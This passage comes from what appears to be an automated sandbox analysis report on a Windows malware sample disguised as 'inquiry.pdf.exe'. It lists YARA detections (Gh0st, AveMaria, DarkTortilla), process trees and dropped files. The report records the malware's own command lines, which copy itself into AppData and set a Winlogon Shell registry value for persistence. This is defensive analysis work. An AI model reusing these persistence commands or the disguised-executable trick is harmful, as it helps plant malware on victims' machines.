            Source: 00000013.00000000.404261855.0000000000A54000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 00000014.00000003.486255631.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 00000014.00000003.485919583.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000014.00000003.486150119.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: C:\Users\user\Desktop\inquiry.pdf.exeCode function: 0_2_00E382180_2_00E38218
            Source: C:\Users\user\Desktop\inquiry.pdf.exeCode function: 0_2_00E345180_2_00E34518
            Source: C:\Users\user\Desktop\inquiry.pdf.exeCode function: 0_2_00E388400_2_00E38840
            Source: C:\Users\user\Desktop\inquiry.pdf.exeCode function: 0_2_00E36B000_2_00E36B00
            Source: C:\Users\user\Desktop\inquiry.pdf.exeCode function: 0_2_00E3BD400_2_00E3BD40
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_0124821818_2_01248218
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_0124451818_2_01244518
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_0124884018_2_01248840
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_01246B0018_2_01246B00
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_0124F61818_2_0124F618
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_0298A24018_2_0298A240
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_0298404818_2_02984048
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_0298470018_2_02984700
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_02988B6118_2_02988B61
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_029828E018_2_029828E0
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_029849D118_2_029849D1
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_02987E2018_2_02987E20
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_0298801918_2_02988019
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_0298003918_2_02980039
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_0298403918_2_02984039
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_0298004018_2_02980040
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_029846F018_2_029846F0
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_0298679918_2_02986799
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_029867A018_2_029867A0
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_029885D818_2_029885D8
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_029885C818_2_029885C8
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_02988B9018_2_02988B90
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_02982B8018_2_02982B80
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_02982B7018_2_02982B70
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_029828CF18_2_029828CF
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_0298321018_2_02983210
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_0298320018_2_02983200
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_0298387818_2_02983878
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_0298386818_2_02983868
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_02987E1018_2_02987E10
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_02987DD118_2_02987DD1
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_05112C9018_2_05112C90
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_051105F018_2_051105F0
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_0511004018_2_05110040
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_02989CA8 CreateProcessAsUserW,18_2_02989CA8
            Source: inquiry.pdf.exe, 00000000.00000000.244002427.0000000000B3A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewagl.exeD vs inquiry.pdf.exe
            Source: inquiry.pdf.exe, 00000000.00000002.327749606.0000000002F43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAstronot plart.exe> vs inquiry.pdf.exe
            Source: inquiry.pdf.exe, 00000000.00000002.313574266.0000000000E5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs inquiry.pdf.exe
            Source: inquiry.pdf.exe, 00000000.00000002.328318734.0000000003A75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevfdgghyyyzd.dll8 vs inquiry.pdf.exe
            Source: inquiry.pdf.exe, 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAstronot plart.exe> vs inquiry.pdf.exe
            Source: inquiry.pdf.exe, 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAstronot plart.exe> vs inquiry.pdf.exe
            Source: inquiry.pdf.exe, 00000000.00000002.330587369.0000000006070000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamevfdgghyyyzd.dll8 vs inquiry.pdf.exe
            Source: inquiry.pdf.exe, 00000000.00000002.319901193.0000000002B4E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAstronot plart.exe> vs inquiry.pdf.exe
            Source: inquiry.pdf.exeBinary or memory string: OriginalFilenamewagl.exeD vs inquiry.pdf.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\glonkjhg.exe,"
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe 2D0DC6216F613AC7551A7E70A798C22AEE8EB9819428B1357E2B8C73BEF905AD
            Source: inquiry.pdf.exeReversingLabs: Detection: 39%
            Source: inquiry.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\inquiry.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\inquiry.pdf.exe C:\Users\user\Desktop\inquiry.pdf.exe
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 7 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\glonkjhg.exe,
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 7
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 12 > nul && copy "C:\Users\user\Desktop\inquiry.pdf.exe" "C:\Users\user\AppData\Roaming\glonkjhg.exe" && ping 127.0.0.1 -n 12 > nul && "C:\Users\user\AppData\Roaming\glonkjhg.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 12
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\glonkjhg.exe,"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 12
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\glonkjhg.exe C:\Users\user\AppData\Roaming\glonkjhg.exe
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 7 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\glonkjhg.exe,Jump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 12 > nul && copy "C:\Users\user\Desktop\inquiry.pdf.exe" "C:\Users\user\AppData\Roaming\glonkjhg.exe" && ping 127.0.0.1 -n 12 > nul && "C:\Users\user\AppData\Roaming\glonkjhg.exeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 7 Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\glonkjhg.exe,"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 12 Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 12 Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\glonkjhg.exe C:\Users\user\AppData\Roaming\glonkjhg.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe" Jump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\inquiry.pdf.exe.logJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeFile created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.txtJump to behavior
            Source: classification engineClassification label: mal100.phis.troj.expl.evad.winEXE@29/9@7/3
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: inquiry.pdf.exe, 00000000.00000000.243992051.0000000000B2D000.00000020.00000001.01000000.00000003.sdmp, glonkjhg.exe.13.drBinary or memory string: Select * FROM BillingTable WHERE Billing_ID LIKE @search OR Guest_ID LIKE @search OR Booking_ID LIKE @search OR Payment_Status LIKE @search;
            Source: inquiry.pdf.exe, 00000000.00000000.243992051.0000000000B2D000.00000020.00000001.01000000.00000003.sdmp, glonkjhg.exe.13.drBinary or memory string: UPDATE RoomTable SET Room_Status = @booked WHERE Room_Number LIKE @room;
            Source: inquiry.pdf.exe, 00000000.00000000.243992051.0000000000B2D000.00000020.00000001.01000000.00000003.sdmp, glonkjhg.exe.13.drBinary or memory string: UPDATE RoomTable SET Room_Status = @unbooked WHERE Room_Number LIKE @room;
            Source: inquiry.pdf.exe, 00000000.00000000.243992051.0000000000B2D000.00000020.00000001.01000000.00000003.sdmp, glonkjhg.exe.13.drBinary or memory string: Select * FROM BookingTable WHERE Guest_ID LIKE @search OR Booking_ID LIKE @search OR Room_ID LIKE @search OR Status LIKE @search;
            Source: inquiry.pdf.exe, 00000000.00000000.243992051.0000000000B2D000.00000020.00000001.01000000.00000003.sdmp, glonkjhg.exe.13.drBinary or memory string: SELECT Guest_ID FROM GuestTable WHERE Guest_ID NOT IN(SELECT Guest_ID FROM BookingTable WHERE Status = 'Active');
            Source: inquiry.pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\inquiry.pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5868:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4496:120:WilError_01
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Program Files\Microsoft DN1Jump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: inquiry.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
            Source: inquiry.pdf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, 00000014.00000002.515139413.0000000003018000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000014.00000002.515139413.0000000003018000.00000004.00000800.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Yara detected DarkTortilla Crypter
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3b9a2b2.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3c6b362.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3d7a30a.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3ca925a.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE
